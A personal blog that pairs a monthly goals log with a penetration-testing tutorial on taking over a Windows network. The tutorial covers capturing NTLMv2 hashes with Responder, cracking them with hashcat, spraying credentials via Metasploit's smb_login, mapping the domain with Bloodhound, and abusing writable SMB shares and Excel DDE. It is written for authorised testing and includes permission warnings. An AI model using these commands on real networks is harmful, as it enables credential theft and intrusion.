150 active minutes per weekI am not getting “active” minutes (on the FitBit scale) on the exercise bike to the same degree I was from jogging. But I am doing 20 minutes at least 3 times a week. I am going out for walks with the kids and gardening at the weekends. None of this is seemingly counting on the FitBit scale.
I am working on getting back to activity it feels closer.
1 technical blog a monthSuccess. I documented the basics of attacking an internal network using Responder, Hashcat, Metasploit, Bloodhound and CrackMapExec. Giddy thrill of apparently this being shared by threat actors enough to wind up in threat intelligence feeds. Which is bemusing for entry level tooling and techniques that have been around for years.
Support my partner to exerciseThey stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to goto visitor attractions again like the world class museums in Glasgow.
Record five songsI have recorded heaps of short ideas. Mostly on the guitar sat out in the sunshine. Some of them I can see me converting into 2-3 minute items.
OSWEI’ll be honest I think this is a Winter time activity.
Panic AttacksI have avoided them again this month.

Other bits

  • Research – I was not able to talk about this last month but the Fedena research finally came out. My team and I found seven vulnerabilities in this school management software. It took over a year from discovery to posting. This was picked up by the daily swig, which was nice! Getting clear of this has given me a boost to go find some more bugs. The technical details for the authentication bypass CVE-2021-27980 are out for reading. Or just the short video of the PoC:

  • Euro 2020 – I cannot adequately put into words how excited I was for this. I barely watch football these days but I just love these tournaments. The fact that Scotland were at the party just made it all the more exciting. The build up to the first game was fantastic and I was singing through the entire game. It doesn’t matter that Scotland exited early. We actually played pretty well. I would say that was pretty much the tale for our tournament in the end. We played well. We created chances. But we couldn’t take them and that was the end of that.
  • Audiobooks 1 – technically still on Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. But without much exercise or walking occurring these days my time has been limited.
  • Television 1 – Star Trek Voyager. I have completed this and it honestly stands up quite well. Last time I watched it there were far more episodes I wanted to skip. This time I was ok with most of it. Some excellent Star Trek in here.
  • Television 2 – Brooklyn 99. After voyager I fell back into season 7 of this. What a lovingly made show this is. Captain Raymond Holt going badass over his fluffy boy being kidnapped is a total highlight.
  • House – We booked someone to come replace the bathroom sink and they have not done so yet. We have sort of been stuck waiting on that as we are trying to do things in a set order.
  • Garden – Has paid out strawberries twice already this summer. I have had horrific hay fever (the worst I have ever had) but I have still been able to murder the lawn appropriately so hopefully I will learn to get that done more effectively to minimise the impact. I have been out the back in a Darth Vader style breathing mask but that didn’t actually reduce the symptoms after cutting the grass. Answers on a post card (or comment) welcome.

That is the log for June.

Grabbing NTLM hashes with Responder then what?

Local networks have lots of things on them that we as penetration testers can exploit. In a Windows environment there are often protocols (LLMNR and NBT-NS) which can be easily exploitable. Effectively you are running a man in the middle attack and using that to intercept traffic being sent by users in order to capture their hashed password.

To do this you need to be in control of a machine in the LAN which for us usually means our laptop, or a VM if the customer is enabling remote testing via a VPN.

Running Responder

For years the tool of choice has been Responder.

If you are doing this on a remote server rather than your laptop then you should first launch “tmux”. I have blogged about persistent SSH sessions before. The super tl;dr version is this:

tmux new -s <session name>
tmux new -s responder

If you get disconnected you will need to re-establish your SSH connection. Then you can reattach:

tmux attach -t <session name>
tmux attach -t responder

It is worth your energy to learn more about tmux:

As for running responder it is as simple as this:

responder -I <interface>
responder -I eth0

It is capable of many more things such as prompting users with fake prompts to obtain plaintext passwords. In this default configuration it will find LLMNR and NBT-NS traffic. It will respond on behalf of the servers the victim is looking for and capture their NTLM hashes.

These hashes have to be cracked using brute-force before they can be used. This is in contrast to any passwords you may pull out of the registry for local Windows accounts where you can use pass the hash.

Responder Log Files

As responder runs it saves detailed logs in this folder:

/usr/share/responder/logs

For each captured hash there will be a file like “SMB-NTLMv2-SSP-<ip>.txt”. This will contain hashes intended for that host. There will be repeated hashes for the same account because you will have likely captured the same user multiple times.

For completeness you may want to try cracking every different hash because what if the victim had typed their credentials incorrectly? In practice when you have hundreds of unique user hashes the risk of that is pretty minimal. If you want to crack all the things take all of these “SMB-NTLMv2-SSP-<ip>.txt” files and run them through hashcat (shown later).

When I have hundreds of hashes, the file I work with is “Responder-Session.log”. This is equivalent to what the tool spits out to the terminal as it captures things. To use this I use a bash loop to extract the first hash for each username.

Bash Loop To Extract Unique Hashes

First we need to list the unique usernames we have captured:

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

Some points about this:

  • The sort command “-u” (unique) “-f” (case insensitive) .
  • Cut is wonderful at splitting a line in output which has delimiters in it allowing you to select specific columns from the results. Using “-f 4-6” we say our username is also at a specific domain i.e. “cornerpirate::DOMAIN”. This means if the same username exists across domains then you are going to include them.
  • The awk command removes the first character and without it your usernames would have one white space before them.

For each username we need to obtain the first NTLMv2 hash and save it into a file:

for user in `strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'`
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 |  head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done

The results are saved into “ntlm-hashes.txt”. Note that it uses “>>” to redirect into that file. This means that if you run this loop again you will see duplicate hashes being added. So remember to delete the file before running the loop again.

Apart from that the only difference is the cut command is getting all columns “4-10” instead of just 4 which is the username, and the use of “head -n 1” to just get the first occurrence of that users hash.

I have added the “echo” command so that you are certain it is doing its job. Otherwise this loop can take some time and you might get concerned.

For most intents and purposes this for loop will get you enough hashes to go attack.

Hashcat command to crack NTLMv2 Hashes

On an x64 Windows system your command is this:

hashcat64.exe -m 5600 <hashes file> <wordlist> -o <output file>
hashcat64.exe -m 5600 ntlm-hashes.txt Rocktastic12a -o cracked.txt

The “Rocktastic12a” is available for download from Nettitude. At around 13GB this is a reasonable wordlist that doesn’t go overboard at eating disk space. It is useful for most situations.

When hashes get cracked they will be saved in the output file (cracked.txt) where you can extract them for use.

Spraying Cracked Passwords using Metasploit

Metasploit includes the “smb_login” module which is usually used for password brute force attacks. It also has a “USERPASS_FILE” option as described below:

When making login attempts we need to also set the “SMBDomain” value appropriately. Before we get ahead of ourselves we need to determine how many domains we have credentials for:

cat cracked.txt | cut -d ":" -f 3 | sort -u -f

This will spit out an alphabetised list of domains that you have cracked hashes for. You will need to create one “USERPASS_FILE” for each domain. The following loop will do what you need:

for domain in `cat cracked.txt | cut -d ":" -f 3 | sort -u -f`
do 
grep -i $domain cracked.txt| cut --output-delimiter=' ' -d ":" -f 1,7 >> userpass_$domain.txt
done

The output will be stored in one or more txt files called “userpass_*.txt”.

For each target domain you now do this as the options into “smb_login”:

set SMBDomain <DOMAINNAME>
set USERPASS_FILE /path/to/userpass_domain.txt

Before hitting “exploit” you are going to need to tell Metasploit which hosts to log into using the “RHOSTS” option. As I am assuming you are on a legitimate penetration test you can be noisy on the network. You would NOT be doing this kind of thing on a red team engagement where you are being tasked with avoiding detection.

The “major yolo” is to spam these creds at literally every host that speaks SMB on TCP port 445. A single IP suddenly logging in across the network with multiple accounts would be like setting off a bunch of fireworks for the Blue Team to see. This is why you would only do this on a Pentest and not where you needed to be subtle.

The “minor yolo” is to look into the responder logs folder and extract the IP addresses people were logging onto. These systems give you a high degree of certainty that the credentials are valid ahead of time.

However you do it, set your “RHOSTS” appropriately and then type “exploit”. This will tell you a list of credentials that were valid. It will also populate Metasploits database of compromised credentials which you can access via the “creds” command. You should definitely get comfortable using creds because it is a massive bonus having a queryable list of known valid credentials during an engagement.

Now what?

To recap we have gone from the perspective of an attacker on the LAN without any knowledge or passwords to a point where we have found valid domain credentials.

If you are lucky then some of the compromised credentials will already have elevated privileges and then you are pretty much done. Recently I had 250 ish compromised accounts but every single one of them only was only in the “Domain User” group. So the rest is assuming we have only those permissions what can we do?

Domain Reconnaissance with Bloodhound

Bloodhound is fantastic. When you have access to a domain account you can gather data from your machine using this python script:

python3 bloodhound.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -gc <DOMAIN_CONTROLLER_ADDRESS> -c all

If you an interactive shell on a machine already then you can also use various other “ingestor” scripts.

This will create a bunch of .json files in the current working directory. There are plenty of blogs out there describing how install the Bloodhound user interface. However, many of those are outdated in 2021 because it was previously more difficult. There is now an apt package so using Docker is no longer the simplest route (however using a container is ephemeral which may be useful to you if you need to avoid caching customer data).

Install neo4j:

apt-get install neo4j

Then run that using this:

neo4j console

Follow the instructions spat out to the terminal. This will require you to use a web browser to setup a database with a username and password. You will need to know these credentials so that bloodhound can use neo4j later.

Next install bloodhound:

apt-get install bloodhound

So long as neo4j is running all you need to do is run your new command “bloodhound” at the terminal and enter your neo4j credentials and you are away!

Import those json files and then explore the UI to discover juicy information about the domain. You can use this to confirm how many users are in the “Domain Admins” group, what machines they are logged into, and loads more things.

Inspect SMB Shares

CrackMapExec is an amazing tool. This lets you specify a set of credentials and then blast through an entire network to determine what SMB shares they can access. It is often the case that insecure file permissions exist on these shares.

Prioritise exploring any share where you have write access. If that share has executables (.msi, .exe, .bat, .ps1 etc) then you have a chance to modify them. Doing so will give you an easy privilege escalation vector since the victim would execute the code you have supplied. Warning: do not do this without your customer’s permission.

If you have read access to any configuration files then go hunting for plain-text credentials. These will obviously give you lateral movement opportunities. It is common to gain access to databases using this technique.

If you have access to documents then go looking for juicy content. If there is an excel file that is heavily accessed then consider using dynamic data exchange (DDE) to execute commands on the PC’s of other users. Warning: this will prompt victims with security warnings before code executes, again do this with customer permission.

The documentation for CrackMapExec is fantastic. You can use it to do wonderful things so I recommend it with all my heart.

Then what?

I had to stop the journey somewhere. That is basically now. You should have gained access to significant resources by this point. You need to keep detailed notes as you did this so that you know exactly how you obtained which permissions or levels of access. The customer is going to thank you if the report is super clear about what you accessed and how you got there.

I make an appendix in my report called “Route to Domain Admin” where I start from the initial point and then as I progress through the levels of privilege I explain how. There may be several ways to do a certain step so you need to document them too.

Happy hunting.